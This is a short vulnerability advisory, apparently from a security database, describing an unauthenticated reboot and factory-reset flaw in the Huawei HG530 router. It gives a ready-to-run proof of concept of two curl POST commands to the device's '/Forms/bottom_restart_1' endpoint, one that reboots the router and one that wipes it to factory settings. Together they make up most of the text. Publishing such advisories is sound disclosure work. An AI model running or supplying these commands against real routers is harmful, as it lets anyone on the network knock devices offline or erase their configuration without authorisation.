Huawei HG530 Reboot / Restore Authentication Bypass

2019.07.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Huawei HG530 Multiple Unauthenticated reboot and restore Vulnerability =========================== The Huawei HG530 suffers from multiple Unauthenticated reboot and restore vulnerability allows local attackers to reboot the device or to restore to factory Configuration without user interaction. ================== The vulnerability is located in form POST data parameter in 'Restart_factory' via path '/Forms/bottom_restart_1' ==================== Security issue PoC : 1-Rebooting : curl -vv -X POST --path-as-is http://192.168.1.1/Forms/bottom_restart_1 -d ' defaltRomFlag=0&defaultIpFactory=192.168.1.1&Restart_factory=0' 2-Restoring : curl -vv -X POST --path-as-is http://192.168.1.1/Forms/bottom_restart_1 -d ' defaltRomFlag=0&defaultIpFactory=192.168.1.1&Restart_factory=1' ========================


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top